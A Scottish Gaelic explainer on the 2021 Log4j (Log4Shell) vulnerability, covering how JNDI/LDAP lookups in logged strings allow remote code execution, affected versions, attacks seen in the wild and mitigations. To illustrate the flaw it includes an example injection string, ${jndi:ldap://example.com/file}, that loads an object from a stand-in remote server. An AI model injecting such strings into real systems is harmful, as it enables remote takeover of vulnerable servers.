Clàr-innse[Falaich][Seall]
Aig deireadh na Samhna 2021, lorg sinn prìomh chunnart do cybersecurity. Dh’ fhaodadh an cleachdadh seo buaidh a thoirt air milleanan de shiostaman coimpiutair air feadh an t-saoghail.
Is e seo stiùireadh air so-leòntachd Log4j agus mar a dh’ fhàg locht dealbhaidh nach deach dearmad a dhèanamh air còrr air 90% de sheirbheisean coimpiutair an t-saoghail fosgailte airson ionnsaigh.
Tha Apache Log4j na ghoireas logaidh fosgailte stèidhichte air Java a chaidh a leasachadh leis an Apache Software Foundation. Air a sgrìobhadh an toiseach le Ceki Gülcü ann an 2001, tha e a-nis na phàirt de Apache Loging Services, pròiseact de Bhunait Bathar-bog Apache.
Bidh companaidhean air feadh an t-saoghail a’ cleachdadh leabharlann Log4j gus logadh a-steach air na tagraidhean aca. Gu dearbh, tha leabharlann Java cho uile-làthaireach, faodaidh tu a lorg ann an tagraidhean bho Amazon, Microsoft, Google, agus barrachd.
Tha follaiseachd an leabharlainn a’ ciallachadh gum faodadh locht sam bith a dh’ fhaodadh a bhith sa chòd na milleanan de choimpiutairean fhàgail fosgailte airson a bhith air an slaodadh. Air 24 Samhain, 2021, a tèarainteachd sgòthan lorg neach-rannsachaidh a bha ag obair dha Alibaba locht uamhasach.
Bha so-leòntachd Log4j, ris an canar cuideachd Log4Shell, ann gun mhothachadh bho 2013. Thug an so-leòntachd cothrom do chleasaichean droch-rùnach còd a ruith air siostaman air an robh buaidh a’ ruith Log4j. Chaidh fhoillseachadh gu poblach air 9 Dùbhlachd, 2021
Bidh eòlaichean gnìomhachais a’ gairm locht Log4Shell an an so-leòntachd as motha ann an cuimhne o chionn ghoirid.
Anns an t-seachdain às deidh foillseachadh an so-leòntachd, lorg sgiobaidhean cybersecurity milleanan de ionnsaighean. Chunnaic cuid de luchd-rannsachaidh eadhon ìre de chòrr air ceud ionnsaigh gach mionaid.
Ciamar a dh'obraicheas e?
Gus tuigsinn carson a tha Log4Shell cho cunnartach, feumaidh sinn tuigsinn dè as urrainn dha.
Tha so-leòntachd Log4Shell a’ ceadachadh cur an gnìomh còd neo-riaghailteach, a tha gu bunaiteach a’ ciallachadh gun urrainn do neach-ionnsaigh àithne no còd sam bith a ruith air inneal targaid.
Ciamar a choileanas e seo?
An toiseach, feumaidh sinn tuigsinn dè a th’ ann an JNDI.
Tha an Java Nameing and Directory Interface (JNDI) na sheirbheis Java a leigeas le prògraman Java dàta agus goireasan a lorg agus a lorg tro ainm. Tha na seirbheisean seòlaidh seo cudromach oir tha iad a’ toirt seachad seata eagraichte de chlàran airson luchd-leasachaidh airson iomradh a thoirt orra gu furasta nuair a bhios iad a’ cruthachadh thagraidhean.
Faodaidh an JNDI diofar phròtacalan a chleachdadh gus faighinn gu eòlaire sònraichte. Is e aon de na protocolaidhean sin am Pròtacal Ruigsinneachd Eòlaire aotrom, no LDAP.
Nuair a chlàraicheas tu sreang, Log 4j a’ coileanadh ionadan sreang nuair a choinnicheas iad ri abairtean den fhoirm ${prefix:name}
.
Mar eisimpleir, Text: ${java:version}
dh’ fhaodadh a bhith air a logadh mar Text: Java version 1.8.0_65. Tha an seòrsa seo de luchd-ionaid cumanta.
Faodaidh sinn cuideachd abairtean mar Text: ${jndi:ldap://example.com/file}
a chleachdas an siostam JNDI gus rud Java a luchdachadh bho URL tro phròtacal LDAP.
Bidh seo gu h-èifeachdach a’ luchdachadh an dàta a thig bhon URL sin a-steach don inneal. Faodaidh neach-tarraing sam bith còd droch-rùnach a chumail air URL poblach agus feitheamh ri innealan a chleachdas Log4j airson a logadh.
Leis gu bheil dàta fo smachd luchd-cleachdaidh ann an susbaint teachdaireachdan log, faodaidh luchd-hackers na h-iomraidhean JNDI aca fhèin a chuir a-steach a tha a’ comharrachadh na frithealaichean LDAP air a bheil smachd aca. Faodaidh na frithealaichean LDAP seo a bhith làn de nithean droch-rùnach Java a dh’ fhaodas an JNDI a chuir an gnìomh tron so-leòntachd.
Is e an rud a tha a’ dèanamh seo nas miosa nach eil e gu diofar an e tagradh taobh an fhrithealaiche no taobh teachdaiche a tha san tagradh.
Cho fad ‘s a tha dòigh ann don neach-logaidh còd droch-rùnach an neach-ionnsaigh a leughadh, tha an tagradh fhathast fosgailte airson brathan.
Cò air a tha buaidh?
Bidh an so-leòntachd a’ toirt buaidh air a h-uile siostam agus seirbheis a bhios a’ cleachdadh APache Log4j, le dreachan 2.0 suas gu agus a’ toirt a-steach 2.14.1.
Tha grunn eòlaichean tèarainteachd a’ comhairleachadh gum faodadh an so-leòntachd buaidh a thoirt air grunn thagraidhean a’ cleachdadh Java.
Chaidh an locht a lorg an toiseach anns a’ gheama bhidio Minecraft aig Microsoft. Tha Microsoft air ìmpidh a chuir air an luchd-cleachdaidh am bathar-bog Minecraft deasachadh Java aca ùrachadh gus casg a chuir air cunnart sam bith.
Tha Jen Easterly, Stiùiriche Buidheann Tèarainteachd Cybersecurity agus Bun-structair (CISA) ag ràdh gu bheil luchd-reic uallach mòr gus casg a chuir air luchd-cleachdaidh deireannach bho chleasaichean droch-rùnach a bhith a’ gabhail brath air an so-leòntachd seo.
“Bu chòir do luchd-reic cuideachd a bhith a’ conaltradh ris an luchd-ceannach aca gus dèanamh cinnteach gu bheil fios aig luchd-cleachdaidh deireannach gu bheil an so-leòntachd seo anns an toradh aca agus bu chòir dhaibh prìomhachas a thoirt do ùrachadh bathar-bog. ”
Tha e air aithris gu bheil na h-ionnsaighean air tòiseachadh mar-thà. Tha Symantec, companaidh a bheir seachad bathar-bog cybersecurity, air grunn iarrtasan ionnsaigh fhaicinn.
Seo eisimpleirean de na seòrsaichean ionnsaighean a lorg luchd-rannsachaidh:
- botnets
Is e lìonra de choimpiutairean a th’ ann am botnets a tha fo smachd aon phàrtaidh ionnsaigh. Bidh iad a’ cuideachadh le bhith a’ coileanadh ionnsaighean DDoS, a’ goid dàta, agus sgamannan eile. Chunnaic luchd-rannsachaidh botnet Muhstik ann an sgriobtaichean shligean a chaidh a luchdachadh sìos bho sgrùdadh Log4j.
- XMRig Miner Trojan
Tha XMRig na mhèinnear cryptocurrency stòr fosgailte a bhios a’ cleachdadh CPUan gus tòcan Monero a mhèinneadh. Faodaidh cybercriminals XMRig a chuir a-steach air innealan dhaoine gus an urrainn dhaibh an cumhachd giollachd a chleachdadh gun fhios dhaibh.
- Khonsari Ransomware
Tha Ransomware a’ toirt iomradh air seòrsa de malware a chaidh a dhealbhadh gus crioptachadh faidhlichean air coimpiutair. Faodaidh luchd-ionnsaigh an uairsin pàigheadh iarraidh mar mhalairt air cothrom a thoirt air ais gu na faidhlichean crioptaichte. Lorg luchd-rannsachaidh an Khonsari ransomware ann an ionnsaighean Log4Shell. Bidh iad ag amas air frithealaichean Windows agus a’ cleachdadh frèam .NET.
Dè thachras a-nis?
Tha eòlaichean a’ dèanamh a-mach gur dòcha gun toir e mìosan no is dòcha eadhon bliadhnaichean gus an ùpraid a dh’ adhbhraich so-leòntachd Log4J a cheartachadh.
Tha am pròiseas seo a’ toirt a-steach ùrachadh gach siostam air a bheil buaidh le dreach paiste. Eadhon ged a tha na siostaman sin uile glaiste, tha cunnart ann fhathast gum bi dorsan air ais a dh’ fhaodadh a bhith air luchd-hackers a chuir ris an uinneig a bha luchd-frithealaidh fosgailte airson ionnsaigh.
Tha mòran fuasglaidhean agus lasachaidhean ann gus casg a chuir air tagraidhean a bhith air an cleachdadh leis a’ bhiast seo. Dh’ atharraich an dreach ùr Log4j 2.15.0-rc1 diofar shuidheachaidhean gus an so-leòntachd seo a lasachadh.
Bidh a h-uile feart a’ cleachdadh JNDI à comas gu bunaiteach agus chaidh casg a chuir air lorgan iomallach cuideachd. Le bhith a’ cuir à comas am feart sgrùdaidh air an t-suidheachadh Log4j agad cuidichidh sin le bhith a’ lughdachadh cunnart buannachdan a dh’ fhaodadh a bhith ann.
Taobh a-muigh Log4j, tha feum fhathast air plana nas fharsainge gus casg a chuir air buannachdan stòr fosgailte.
Na bu thràithe sa Chèitean, leig an Taigh Geal a-mach aithris òrdugh gnìomh a bha ag amas air cybersecurity nàiseanta a leasachadh. Ghabh e a-steach ullachadh airson bile bathar-bog de stuthan (SBOM) a bha gu ìre mhòr na sgrìobhainn fhoirmeil anns an robh liosta de gach nì a dh’ fheumar gus an tagradh a thogail.
Tha seo a’ toirt a-steach pàirtean leithid an open source pasganan, eisimeileachd, agus APIan air an cleachdadh airson leasachadh. Ged a tha am beachd air SBOMn feumail airson follaiseachd, an cuidich e gu mòr an neach-cleachdaidh?
Faodaidh àrdachadh eisimeileachd a bhith cus de dhuilgheadas. Faodaidh companaidhean dìreach roghnachadh càin sam bith a phàigheadh seach a bhith a’ caitheamh ùine a bharrachd a’ lorg phasganan eile. Is dòcha nach bi na SBOMn sin feumail ach ma tha farsaingeachd air a chuingealachadh nas fhaide.
Co-dhùnadh
Tha cùis Log4j nas motha na dìreach duilgheadas teignigeach dha buidhnean.
Feumaidh stiùirichean gnìomhachais a bhith mothachail air cunnartan a dh’ fhaodadh tachairt nuair a tha na frithealaichean, na toraidhean no na seirbheisean aca an urra ri còd nach eil iad fhèin a’ cumail suas.
Bidh beagan cunnart an-còmhnaidh an urra ri tagraidhean stòr fosgailte agus treas pàrtaidh. Bu chòir do chompanaidhean beachdachadh air ro-innleachdan lasachaidh cunnairt obrachadh a-mach mus tig bagairtean ùra am follais.
Tha mòran den lìon an urra ri bathar-bog stòr fosgailte a tha na mìltean de shaor-thoilich air a chumail suas air feadh an t-saoghail.
Ma tha sinn airson an lìon a chumail na àite sàbhailte, bu chòir do riaghaltasan agus corporaidean tasgadh a dhèanamh ann a bhith a’ maoineachadh oidhirpean stòr fosgailte agus buidhnean cybersecurity leithid CISA.
Leave a Reply